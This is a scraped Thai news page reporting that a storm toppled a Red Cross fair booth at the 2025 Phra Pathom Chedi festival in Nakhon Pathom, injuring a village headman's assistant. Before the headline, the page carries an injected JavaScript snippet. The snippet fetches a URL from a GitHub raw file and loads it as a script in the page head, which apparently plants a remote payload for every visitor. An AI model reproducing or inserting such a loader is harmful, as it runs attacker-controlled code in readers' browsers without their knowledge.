;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); นครปฐม พายุพัดแรง ป้ายงานกาชาดล้ม ทับผู้ช่วยผู้ใหญ่บ้านเจ็บส่งท้ายงานองค์พระปฐมฯ - ThaiReference | อาสาไทยยืนยัน
นครปฐม พายุพัดแรง ป้ายงานกาชาดล้ม ทับผู้ช่วยผู้ใหญ่บ้านเจ็บส่งท้ายงานองค์พระปฐมฯ

เมื่อช่วงค่ำที่ผ่านมาภายในบริเวณลานด้านขวาองค์พระปฐมเจดีย์ได้เกิดลมพายุฝนพัดอย่างรุนแรงทำให้ซุ้มงานกาชาดล้มทับเจ้าหน้าที่ผู้ปฏิบัติงานร้านมัจฉากาชาด ได้รับบาดเจ็บบริเวณหลัง จำนวน 1 ราย  ทราบชื่อคือ  นางสาวกรกมณ แก้วตา อายุ 37 ปี เป็บนผู้ช่วยผู้ใหญ่บ้าน หมู่ 4 ต.มหาสวัสดิ์โดยมีผู้ถ่ายคลิบไว้ได้ ในขณะที่กำลังวิ่งเข้าเต๊นท์หลบพายุฝน โดยหลังเกิดเหตุทางเหล่ากาชาดได้รีบแจ้ง จนท.โรงพยาบาลนครปฐมเคลื่อนย้ายผู้ได้รับบาดเจ็บไปส่งโรงพยาบาลนครปฐมเพื่อตรวจรักษาโดยเร่งด่วนแล้ว

สำหรับเหตุการณ์ดังกล่าวจึงถือว่าโชคดีเนื่องจากเป็นช่วงที่มีฝนตกทำให้ประชาชนไม่ได้เดินออกมาอยู่ในพื้นที่โล่งจึงเหลือเพียงแต่ และประชาชนไม่กี่คนที่อยู่ในบริเวณดังกล่าวซึ่งหลังเกิดเหตุได้ไม่นานก็ได้มีการดำเนินการจัดงานต่อไปในครั้งสุดท้ายสำหรับการจัดงานเทศกาลนมัสการองค์พระปฐมเจดีย์ประจำปี 2568 ซึ่งจัดขึ้นเป็นเวลาเก้าวันเก้าคืน

ภาพ-ข่าว ปนิทัศน์ -ปณิดา มามีสุข  จ.นครปฐม